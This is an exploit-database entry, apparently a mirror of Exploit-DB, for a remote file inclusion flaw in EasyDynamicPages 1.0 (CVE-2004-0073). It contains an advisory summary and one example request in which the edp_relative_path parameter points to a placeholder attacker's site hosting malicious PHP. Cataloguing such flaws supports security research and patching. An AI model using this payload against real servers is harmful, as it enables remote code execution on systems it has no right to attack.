[] NeoSense
E X P L O I T S
title author type platform port cve id

EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion

Author: tsbeginnervn
type: webapps
platform: php
port: 
date_added: 2004-01-02 
date_updated: 2012-12-19 
verified: 1 
codes: CVE-2004-0073;OSVDB-3408 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software.

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.